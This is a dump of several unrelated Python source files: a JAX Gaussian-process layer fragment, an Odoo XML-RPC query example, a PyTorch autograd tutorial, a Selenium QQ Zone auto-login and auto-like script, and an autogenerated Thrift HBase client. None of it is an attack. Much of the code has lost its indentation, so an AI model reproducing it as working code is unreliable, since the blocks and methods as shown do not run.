scale = self._compute_scale_param(inputs, covmat_sngp, training) # pylint: disable=assignment-from-none
if training:
total_mc_samples = self.train_mc_samples
else:
total_mc_samples = self.test_mc_samples
probs_mean = self._compute_mc_samples(locs, scale, total_mc_samples)
probs_mean = jnp.clip(probs_mean, a_min=self.eps)
log_probs = jnp.log(probs_mean)
# inverse sigmoid
probs_mean = jnp.clip(probs_mean, a_min=self.eps, a_max=1.0 - self.eps)
logits = log_probs - jnp.log(1.0 - probs_mean)
if self.return_locs:
logits = locs
if self.logits_only:
return logits, covmat_sngp
return logits, covmat_sngp, log_probs, probs_mean
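if __name__ == '__main__':
  # Minimal usage sketch added for illustration; it is not part of the original
  # module. It assumes recent flax/jax versions and only exercises
  # RandomFeatureGaussianProcess with dummy data.
  rng_key = random.PRNGKey(0)
  dummy_inputs = jnp.ones((4, 16))
  gp_model = RandomFeatureGaussianProcess(features=3, hidden_features=128)
  variables = gp_model.init(rng_key, dummy_inputs)
  # Training-style call: mark the Laplace collection as mutable so the precision
  # matrix is updated; the covariance output is None in this branch.
  (train_logits, _), updated_state = gp_model.apply(
      variables, dummy_inputs, mutable=['laplace_covariance'])
  # Inference-style call: nothing is mutable, so the layer returns the
  # predictive variances with shape (batch_size,).
  logits, predictive_vars = gp_model.apply(variables, dummy_inputs)
  print(logits.shape, predictive_vars.shape)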
|
Chapter20/02_xmlrpc_fetch_data/books_data2.py | PacktPublishing/-Odoo-13-Development-Cookbook-Fouth-Edition | 125 | 12748342 | <filename>Chapter20/02_xmlrpc_fetch_data/books_data2.py
from xmlrpc import client
# books data with search_read method
server_url = 'http://localhost:8069'
db_name = 'book-db-14'
username = 'admin'
password = '<PASSWORD>'
common = client.ServerProxy('%s/xmlrpc/2/common' % server_url)
user_id = common.authenticate(db_name, username, password, {})
models = client.ServerProxy('%s/xmlrpc/2/object' % server_url)
if user_id:
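    # '|' is Odoo's prefix OR operator: it applies to the next two terms of the domain.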
search_domain = ['|', ['name', 'ilike', 'odoo'], ['name', 'ilike', 'sql']]
    books_data = models.execute_kw(db_name, user_id, password,
                                   'library.book', 'search_read',
                                   [search_domain, ['name', 'date_release']],
                                   {'limit': 5})
    print('Books data:', books_data)
else:
print('Wrong credentials') |
beginner_source/former_torchies/autograd_tutorial_old.py | Ismail-Mustapha/tutorials | 6,424 | 12748343 | <gh_stars>1000+
# -*- coding: utf-8 -*-
"""
Autograd
========
Autograd is now a core torch package for automatic differentiation.
It uses a tape-based system for automatic differentiation.
In the forward phase, the autograd tape will remember all the operations
it executed, and in the backward phase, it will replay the operations.
Tensors that track history
--------------------------
In autograd, if any input ``Tensor`` of an operation has ``requires_grad=True``,
the computation will be tracked. After computing the backward pass, a gradient
w.r.t. this tensor is accumulated into ``.grad`` attribute.
There’s one more class which is very important for autograd
implementation - a ``Function``. ``Tensor`` and ``Function`` are
interconnected and build up an acyclic graph that encodes a complete
history of computation. Each tensor has a ``.grad_fn`` attribute that
references the ``Function`` that created the tensor (except for Tensors
created by the user - these have ``None`` as ``.grad_fn``).
If you want to compute the derivatives, you can call ``.backward()`` on
a ``Tensor``. If the ``Tensor`` is a scalar (i.e. it holds a one-element
tensor), you don’t need to specify any arguments to ``backward()``;
however, if it has more elements, you need to specify a ``grad_output``
argument that is a tensor of matching shape.
"""
import torch
###############################################################
# Create a tensor and set requires_grad=True to track computation with it
x = torch.ones(2, 2, requires_grad=True)
print(x)
###############################################################
#
print(x.data)
###############################################################
#
print(x.grad)
###############################################################
#
print(x.grad_fn) # we've created x ourselves
###############################################################
# Do an operation of x:
y = x + 2
print(y)
###############################################################
# y was created as a result of an operation,
# so it has a grad_fn
print(y.grad_fn)
###############################################################
# More operations on y:
z = y * y * 3
out = z.mean()
print(z, out)
################################################################
# ``.requires_grad_( ... )`` changes an existing Tensor's ``requires_grad``
# flag in-place. The input flag defaults to ``True`` if not given.
a = torch.randn(2, 2)
a = ((a * 3) / (a - 1))
print(a.requires_grad)
a.requires_grad_(True)
print(a.requires_grad)
b = (a * a).sum()
print(b.grad_fn)
###############################################################
# Gradients
# ---------
#
# let's backprop now and print gradients d(out)/dx
out.backward()
print(x.grad)
###############################################################
# By default, gradient computation flushes all the internal buffers
# contained in the graph, so if you ever want to do the backward on some
# part of the graph twice, you need to pass in ``retain_graph=True``
# during the first pass.
x = torch.ones(2, 2, requires_grad=True)
y = x + 2
y.backward(torch.ones(2, 2), retain_graph=True)
# the retain_graph flag will prevent the internal buffers from being freed
print(x.grad)
###############################################################
#
z = y * y
print(z)
###############################################################
#
# just backprop random gradients
gradient = torch.randn(2, 2)
# this would fail if we didn't specify
# that we want to retain the graph
y.backward(gradient)
print(x.grad)
###############################################################
# You can also stop autograd from tracking history on Tensors
# with requires_grad=True by wrapping the code block in
# ``with torch.no_grad():``
print(x.requires_grad)
print((x ** 2).requires_grad)
with torch.no_grad():
print((x ** 2).requires_grad)
|
qqzone/qq_zone.py | rua-aaa/awesome-python-login-model | 5,857 | 12748357 | <reponame>rua-aaa/awesome-python-login-model
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
info:
author:CriseLYJ
github:https://github.com/CriseLYJ/
update_time:2019-3-7
"""
import time  # used for delays
from selenium import webdriver
driver = webdriver.Chrome()  # choose the browser; Chrome is used here
QQ_NUMBER = input('Please enter your QQ number: ')
PASSWORD = input('<PASSWORD>')
driver.get('http://i.qq.com/')
driver.switch_to.frame('login_frame')
driver.find_element_by_id('switcher_plogin').click()
driver.find_element_by_name('u').clear()
driver.find_element_by_name('u').send_keys(QQ_NUMBER)  # enter your QQ number here
driver.find_element_by_name('p').clear()
driver.find_element_by_name('p').send_keys(PASSWORD)  # enter your QQ password here
driver.execute_script("document.getElementById('login_button').parentNode.hidefocus=false;")
driver.find_element_by_xpath('//*[@id="loginform"]/div[4]/a').click()
driver.find_element_by_id('login_button').click()
time.sleep(10)  # I used to be a QQ VIP member, so a renewal pop-up shows up every time I log in...
driver.find_element_by_id('dialog_button_1').click()  # dismiss that pop-up; the sleep above waits for it to appear before cancelling it here
btns = driver.find_elements_by_css_selector('a.item.qz_like_btn_v3')  # CSS selector for the "like" buttons
for btn in btns:
btn.click()
|
core/sqf/src/seatrans/hbase-trx/src/main/python/thrift2/gen-py/hbase/THBaseService.py | CoderSong2015/Apache-Trafodion | 148 | 12748386 | <gh_stars>100-1000
#
# Autogenerated by Thrift Compiler (0.9.0)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py
#
from thrift.Thrift import TType, TMessageType, TException, TApplicationException
from ttypes import *
from thrift.Thrift import TProcessor
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol, TProtocol
try:
from thrift.protocol import fastbinary
except:
fastbinary = None
class Iface:
def exists(self, table, get):
"""
Test for the existence of columns in the table, as specified in the TGet.
@return true if the specified TGet matches one or more keys, false if not
Parameters:
- table: the table to check on
- get: the TGet to check for
"""
pass
def get(self, table, get):
"""
Method for getting data from a row.
If the row cannot be found an empty Result is returned.
This can be checked by the empty field of the TResult
@return the result
Parameters:
- table: the table to get from
- get: the TGet to fetch
"""
pass
def getMultiple(self, table, gets):
"""
Method for getting multiple rows.
If a row cannot be found there will be a null
value in the result list for that TGet at the
same position.
So the Results are in the same order as the TGets.
Parameters:
- table: the table to get from
- gets: a list of TGets to fetch, the Result list
will have the Results at corresponding positions
or null if there was an error
"""
pass
def put(self, table, put):
"""
Commit a TPut to a table.
Parameters:
- table: the table to put data in
- put: the TPut to put
"""
pass
def checkAndPut(self, table, row, family, qualifier, value, put):
"""
Atomically checks if a row/family/qualifier value matches the expected
value. If it does, it adds the TPut.
@return true if the new put was executed, false otherwise
Parameters:
- table: to check in and put to
- row: row to check
- family: column family to check
- qualifier: column qualifier to check
- value: the expected value, if not provided the
check is for the non-existence of the
column in question
- put: the TPut to put if the check succeeds
"""
pass
def putMultiple(self, table, puts):
"""
Commit a List of Puts to the table.
Parameters:
- table: the table to put data in
- puts: a list of TPuts to commit
"""
pass
def deleteSingle(self, table, deleteSingle):
"""
Deletes as specified by the TDelete.
Note: "delete" is a reserved keyword and cannot be used in Thrift
thus the inconsistent naming scheme from the other functions.
Parameters:
- table: the table to delete from
- deleteSingle: the TDelete to delete
"""
pass
def deleteMultiple(self, table, deletes):
"""
Bulk commit a List of TDeletes to the table.
Throws a TIOError if any of the deletes fail.
Always returns an empty list for backwards compatibility.
Parameters:
- table: the table to delete from
- deletes: list of TDeletes to delete
"""
pass
def checkAndDelete(self, table, row, family, qualifier, value, deleteSingle):
"""
Atomically checks if a row/family/qualifier value matches the expected
value. If it does, it adds the delete.
@return true if the new delete was executed, false otherwise
Parameters:
- table: to check in and delete from
- row: row to check
- family: column family to check
- qualifier: column qualifier to check
- value: the expected value, if not provided the
check is for the non-existence of the
column in question
- deleteSingle: the TDelete to execute if the check succeeds
"""
pass
def increment(self, table, increment):
"""
Parameters:
- table: the table to increment the value on
- increment: the TIncrement to increment
"""
pass
def openScanner(self, table, scan):
"""
Get a Scanner for the provided TScan object.
@return Scanner Id to be used with other scanner procedures
Parameters:
- table: the table to get the Scanner for
- scan: the scan object to get a Scanner for
"""
pass
def getScannerRows(self, scannerId, numRows):
"""
Grabs multiple rows from a Scanner.
@return Between zero and numRows TResults
Parameters:
- scannerId: the Id of the Scanner to return rows from. This is an Id returned from the openScanner function.
- numRows: number of rows to return
"""
pass
def closeScanner(self, scannerId):
"""
Closes the scanner. Should be called if you need to close
the Scanner before all results are read.
Exhausted scanners are closed automatically.
Parameters:
- scannerId: the Id of the Scanner to close *
"""
pass
class Client(Iface):
def __init__(self, iprot, oprot=None):
self._iprot = self._oprot = iprot
if oprot is not None:
self._oprot = oprot
self._seqid = 0
def exists(self, table, get):
"""
Test for the existence of columns in the table, as specified in the TGet.
@return true if the specified TGet matches one or more keys, false if not
Parameters:
- table: the table to check on
- get: the TGet to check for
"""
self.send_exists(table, get)
return self.recv_exists()
def send_exists(self, table, get):
self._oprot.writeMessageBegin('exists', TMessageType.CALL, self._seqid)
args = exists_args()
args.table = table
args.get = get
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_exists(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = exists_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.io is not None:
raise result.io
raise TApplicationException(TApplicationException.MISSING_RESULT, "exists failed: unknown result");
def get(self, table, get):
"""
Method for getting data from a row.
If the row cannot be found, an empty Result is returned.
This can be checked by the empty field of the TResult.
@return the result
Parameters:
- table: the table to get from
- get: the TGet to fetch
"""
self.send_get(table, get)
return self.recv_get()
def send_get(self, table, get):
self._oprot.writeMessageBegin('get', TMessageType.CALL, self._seqid)
args = get_args()
args.table = table
args.get = get
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = get_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.io is not None:
raise result.io
raise TApplicationException(TApplicationException.MISSING_RESULT, "get failed: unknown result");
def getMultiple(self, table, gets):
"""
Method for getting multiple rows.
If a row cannot be found, there will be a null
value in the result list for that TGet at the
same position.
So the Results are in the same order as the TGets.
Parameters:
- table: the table to get from
- gets: a list of TGets to fetch; the Result list
will have the Results at corresponding positions
or null if there was an error
"""
self.send_getMultiple(table, gets)
return self.recv_getMultiple()
def send_getMultiple(self, table, gets):
self._oprot.writeMessageBegin('getMultiple', TMessageType.CALL, self._seqid)
args = getMultiple_args()
args.table = table
args.gets = gets
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_getMultiple(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = getMultiple_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.io is not None:
raise result.io
raise TApplicationException(TApplicationException.MISSING_RESULT, "getMultiple failed: unknown result");
def put(self, table, put):
"""
Commit a TPut to a table.
Parameters:
- table: the table to put data in
- put: the TPut to put
"""
self.send_put(table, put)
self.recv_put()
def send_put(self, table, put):
self._oprot.writeMessageBegin('put', TMessageType.CALL, self._seqid)
args = put_args()
args.table = table
args.put = put
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_put(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = put_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.io is not None:
raise result.io
return
def checkAndPut(self, table, row, family, qualifier, value, put):
"""
Atomically checks if a row/family/qualifier value matches the expected
value. If it does, it adds the TPut.
@return true if the new put was executed, false otherwise
Parameters:
- table: to check in and put to
- row: row to check
- family: column family to check
- qualifier: column qualifier to check
- value: the expected value; if not provided, the
check is for the non-existence of the
column in question
- put: the TPut to put if the check succeeds
"""
self.send_checkAndPut(table, row, family, qualifier, value, put)
return self.recv_checkAndPut()
def send_checkAndPut(self, table, row, family, qualifier, value, put):
self._oprot.writeMessageBegin('checkAndPut', TMessageType.CALL, self._seqid)
args = checkAndPut_args()
args.table = table
args.row = row
args.family = family
args.qualifier = qualifier
args.value = value
args.put = put
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_checkAndPut(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = checkAndPut_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.io is not None:
raise result.io
raise TApplicationException(TApplicationException.MISSING_RESULT, "checkAndPut failed: unknown result");
def putMultiple(self, table, puts):
"""
Commit a List of Puts to the table.
Parameters:
- table: the table to put data in
- puts: a list of TPuts to commit
"""
self.send_putMultiple(table, puts)
self.recv_putMultiple()
def send_putMultiple(self, table, puts):
self._oprot.writeMessageBegin('putMultiple', TMessageType.CALL, self._seqid)
args = putMultiple_args()
args.table = table
args.puts = puts
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_putMultiple(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = putMultiple_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.io is not None:
raise result.io
return
def deleteSingle(self, table, deleteSingle):
"""
Deletes as specified by the TDelete.
Note: "delete" is a reserved keyword and cannot be used in Thrift,
hence the naming scheme, which is inconsistent with the other functions.
Parameters:
- table: the table to delete from
- deleteSingle: the TDelete to delete
"""
self.send_deleteSingle(table, deleteSingle)
self.recv_deleteSingle()
def send_deleteSingle(self, table, deleteSingle):
self._oprot.writeMessageBegin('deleteSingle', TMessageType.CALL, self._seqid)
args = deleteSingle_args()
args.table = table
args.deleteSingle = deleteSingle
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_deleteSingle(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = deleteSingle_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.io is not None:
raise result.io
return
def deleteMultiple(self, table, deletes):
"""
Bulk commit a List of TDeletes to the table.
Throws a TIOError if any of the deletes fail.
Always returns an empty list for backwards compatibility.
Parameters:
- table: the table to delete from
- deletes: list of TDeletes to delete
"""
self.send_deleteMultiple(table, deletes)
return self.recv_deleteMultiple()
def send_deleteMultiple(self, table, deletes):
self._oprot.writeMessageBegin('deleteMultiple', TMessageType.CALL, self._seqid)
args = deleteMultiple_args()
args.table = table
args.deletes = deletes
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_deleteMultiple(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = deleteMultiple_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.io is not None:
raise result.io
raise TApplicationException(TApplicationException.MISSING_RESULT, "deleteMultiple failed: unknown result");
def checkAndDelete(self, table, row, family, qualifier, value, deleteSingle):
"""
Atomically checks if a row/family/qualifier value matches the expected
value. If it does, it adds the delete.
@return true if the new delete was executed, false otherwise
Parameters:
- table: to check in and delete from
- row: row to check
- family: column family to check
- qualifier: column qualifier to check
- value: the expected value; if not provided, the
check is for the non-existence of the
column in question
- deleteSingle: the TDelete to execute if the check succeeds
"""
self.send_checkAndDelete(table, row, family, qualifier, value, deleteSingle)
return self.recv_checkAndDelete()
def send_checkAndDelete(self, table, row, family, qualifier, value, deleteSingle):
self._oprot.writeMessageBegin('checkAndDelete', TMessageType.CALL, self._seqid)
args = checkAndDelete_args()
args.table = table
args.row = row
args.family = family
args.qualifier = qualifier
args.value = value
args.deleteSingle = deleteSingle
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_checkAndDelete(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = checkAndDelete_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.io is not None:
raise result.io
raise TApplicationException(TApplicationException.MISSING_RESULT, "checkAndDelete failed: unknown result");
def increment(self, table, increment):
"""
Atomically increments column values in a single row, as specified by the TIncrement.
Parameters:
- table: the table to increment the value on
- increment: the TIncrement to increment
"""
self.send_increment(table, increment)
return self.recv_increment()
def send_increment(self, table, increment):
self._oprot.writeMessageBegin('increment', TMessageType.CALL, self._seqid)
args = increment_args()
args.table = table
args.increment = increment
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_increment(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = increment_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.io is not None:
raise result.io
raise TApplicationException(TApplicationException.MISSING_RESULT, "increment failed: unknown result");
def openScanner(self, table, scan):
"""
Get a Scanner for the provided TScan object.
@return Scanner Id to be used with other scanner procedures
Parameters:
- table: the table to get the Scanner for
- scan: the scan object to get a Scanner for
"""
self.send_openScanner(table, scan)
return self.recv_openScanner()
def send_openScanner(self, table, scan):
self._oprot.writeMessageBegin('openScanner', TMessageType.CALL, self._seqid)
args = openScanner_args()
args.table = table
args.scan = scan
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_openScanner(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = openScanner_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.io is not None:
raise result.io
raise TApplicationException(TApplicationException.MISSING_RESULT, "openScanner failed: unknown result");
def getScannerRows(self, scannerId, numRows):
"""
Grabs multiple rows from a Scanner.
@return Between zero and numRows TResults
Parameters:
- scannerId: the Id of the Scanner to return rows from. This is an Id returned from the openScanner function.
- numRows: number of rows to return
"""
self.send_getScannerRows(scannerId, numRows)
return self.recv_getScannerRows()
def send_getScannerRows(self, scannerId, numRows):
self._oprot.writeMessageBegin('getScannerRows', TMessageType.CALL, self._seqid)
args = getScannerRows_args()
args.scannerId = scannerId
args.numRows = numRows
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_getScannerRows(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = getScannerRows_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.io is not None:
raise result.io
if result.ia is not None:
raise result.ia
raise TApplicationException(TApplicationException.MISSING_RESULT, "getScannerRows failed: unknown result");
def closeScanner(self, scannerId):
"""
Closes the scanner. Should be called if you need to close
the Scanner before all results are read.
Exhausted scanners are closed automatically.
Parameters:
- scannerId: the Id of the Scanner to close
"""
self.send_closeScanner(scannerId)
self.recv_closeScanner()
def send_closeScanner(self, scannerId):
self._oprot.writeMessageBegin('closeScanner', TMessageType.CALL, self._seqid)
args = closeScanner_args()
args.scannerId = scannerId
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_closeScanner(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = closeScanner_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.io is not None:
raise result.io
if result.ia is not None:
raise result.ia
return
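# --- Illustrative usage sketch (not generated code) -------------------------
# Shows the intended life cycle of the scanner methods above: openScanner
# returns an id, getScannerRows is called repeatedly, and closeScanner is only
# required when the scan is abandoned early (exhausted scanners are closed
# automatically).  'client' is a connected Client, 'scan' is a TScan from the
# companion ttypes module, and the batch/row limits are arbitrary assumptions.
def _example_scan_usage(client, table, scan, batch_size=100, row_limit=1000):
  scanner_id = client.openScanner(table, scan)
  results = []
  while True:
    rows = client.getScannerRows(scanner_id, batch_size)
    if not rows:
      break  # scanner exhausted; it is closed automatically
    results.extend(rows)
    if len(results) >= row_limit:
      client.closeScanner(scanner_id)  # stopping early, so release it
      break
  return results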
class Processor(Iface, TProcessor):
def __init__(self, handler):
self._handler = handler
self._processMap = {}
self._processMap["exists"] = Processor.process_exists
self._processMap["get"] = Processor.process_get
self._processMap["getMultiple"] = Processor.process_getMultiple
self._processMap["put"] = Processor.process_put
self._processMap["checkAndPut"] = Processor.process_checkAndPut
self._processMap["putMultiple"] = Processor.process_putMultiple
self._processMap["deleteSingle"] = Processor.process_deleteSingle
self._processMap["deleteMultiple"] = Processor.process_deleteMultiple
self._processMap["checkAndDelete"] = Processor.process_checkAndDelete
self._processMap["increment"] = Processor.process_increment
self._processMap["openScanner"] = Processor.process_openScanner
self._processMap["getScannerRows"] = Processor.process_getScannerRows
self._processMap["closeScanner"] = Processor.process_closeScanner
def process(self, iprot, oprot):
(name, type, seqid) = iprot.readMessageBegin()
if name not in self._processMap:
iprot.skip(TType.STRUCT)
iprot.readMessageEnd()
x = TApplicationException(TApplicationException.UNKNOWN_METHOD, 'Unknown function %s' % (name))
oprot.writeMessageBegin(name, TMessageType.EXCEPTION, seqid)
x.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
return
else:
self._processMap[name](self, seqid, iprot, oprot)
return True
def process_exists(self, seqid, iprot, oprot):
args = exists_args()
args.read(iprot)
iprot.readMessageEnd()
result = exists_result()
try:
result.success = self._handler.exists(args.table, args.get)
except TIOError as io:
result.io = io
oprot.writeMessageBegin("exists", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_get(self, seqid, iprot, oprot):
args = get_args()
args.read(iprot)
iprot.readMessageEnd()
result = get_result()
try:
result.success = self._handler.get(args.table, args.get)
except TIOError as io:
result.io = io
oprot.writeMessageBegin("get", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_getMultiple(self, seqid, iprot, oprot):
args = getMultiple_args()
args.read(iprot)
iprot.readMessageEnd()
result = getMultiple_result()
try:
result.success = self._handler.getMultiple(args.table, args.gets)
except TIOError as io:
result.io = io
oprot.writeMessageBegin("getMultiple", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_put(self, seqid, iprot, oprot):
args = put_args()
args.read(iprot)
iprot.readMessageEnd()
result = put_result()
try:
self._handler.put(args.table, args.put)
except TIOError as io:
result.io = io
oprot.writeMessageBegin("put", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_checkAndPut(self, seqid, iprot, oprot):
args = checkAndPut_args()
args.read(iprot)
iprot.readMessageEnd()
result = checkAndPut_result()
try:
result.success = self._handler.checkAndPut(args.table, args.row, args.family, args.qualifier, args.value, args.put)
except TIOError as io:
result.io = io
oprot.writeMessageBegin("checkAndPut", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_putMultiple(self, seqid, iprot, oprot):
args = putMultiple_args()
args.read(iprot)
iprot.readMessageEnd()
result = putMultiple_result()
try:
self._handler.putMultiple(args.table, args.puts)
except TIOError as io:
result.io = io
oprot.writeMessageBegin("putMultiple", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_deleteSingle(self, seqid, iprot, oprot):
args = deleteSingle_args()
args.read(iprot)
iprot.readMessageEnd()
result = deleteSingle_result()
try:
self._handler.deleteSingle(args.table, args.deleteSingle)
except TIOError as io:
result.io = io
oprot.writeMessageBegin("deleteSingle", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_deleteMultiple(self, seqid, iprot, oprot):
args = deleteMultiple_args()
args.read(iprot)
iprot.readMessageEnd()
result = deleteMultiple_result()
try:
result.success = self._handler.deleteMultiple(args.table, args.deletes)
except TIOError as io:
result.io = io
oprot.writeMessageBegin("deleteMultiple", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_checkAndDelete(self, seqid, iprot, oprot):
args = checkAndDelete_args()
args.read(iprot)
iprot.readMessageEnd()
result = checkAndDelete_result()
try:
result.success = self._handler.checkAndDelete(args.table, args.row, args.family, args.qualifier, args.value, args.deleteSingle)
except TIOError as io:
result.io = io
oprot.writeMessageBegin("checkAndDelete", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_increment(self, seqid, iprot, oprot):
args = increment_args()
args.read(iprot)
iprot.readMessageEnd()
result = increment_result()
try:
result.success = self._handler.increment(args.table, args.increment)
except TIOError as io:
result.io = io
oprot.writeMessageBegin("increment", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_openScanner(self, seqid, iprot, oprot):
args = openScanner_args()
args.read(iprot)
iprot.readMessageEnd()
result = openScanner_result()
try:
result.success = self._handler.openScanner(args.table, args.scan)
except TIOError as io:
result.io = io
oprot.writeMessageBegin("openScanner", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_getScannerRows(self, seqid, iprot, oprot):
args = getScannerRows_args()
args.read(iprot)
iprot.readMessageEnd()
result = getScannerRows_result()
try:
result.success = self._handler.getScannerRows(args.scannerId, args.numRows)
except TIOError as io:
result.io = io
except TIllegalArgument as ia:
result.ia = ia
oprot.writeMessageBegin("getScannerRows", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_closeScanner(self, seqid, iprot, oprot):
args = closeScanner_args()
args.read(iprot)
iprot.readMessageEnd()
result = closeScanner_result()
try:
self._handler.closeScanner(args.scannerId)
except TIOError as io:
result.io = io
except TIllegalArgument as ia:
result.ia = ia
oprot.writeMessageBegin("closeScanner", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
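# --- Illustrative usage sketch (not generated code) -------------------------
# The Processor above is normally paired with a handler object implementing
# Iface and served through the Thrift runtime.  A minimal wiring sketch,
# assuming the standard thrift.server/TSocket/TBinaryProtocol classes; the
# handler and port are assumptions supplied by the caller.
def _example_server_usage(handler, port=9090):
  from thrift.transport import TSocket, TTransport
  from thrift.protocol import TBinaryProtocol
  from thrift.server import TServer
  server = TServer.TSimpleServer(
      Processor(handler),
      TSocket.TServerSocket(port=port),
      TTransport.TBufferedTransportFactory(),
      TBinaryProtocol.TBinaryProtocolFactory())
  server.serve()  # blocks, serving one connection at a time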
# HELPER FUNCTIONS AND STRUCTURES
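# Each RPC method below gets a <method>_args and a <method>_result wrapper
# struct.  thrift_spec tuples are indexed by field id; each entry is
# (field id, wire type, field name, type-specific arguments, default value),
# with None marking unused ids.  read()/write() use the accelerated fastbinary
# codec when it is available and otherwise fall back to the pure-Python path.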
class exists_args:
"""
Attributes:
- table: the table to check on
- get: the TGet to check for
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'table', None, None, ), # 1
(2, TType.STRUCT, 'get', (TGet, TGet.thrift_spec), None, ), # 2
)
def __init__(self, table=None, get=None,):
self.table = table
self.get = get
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
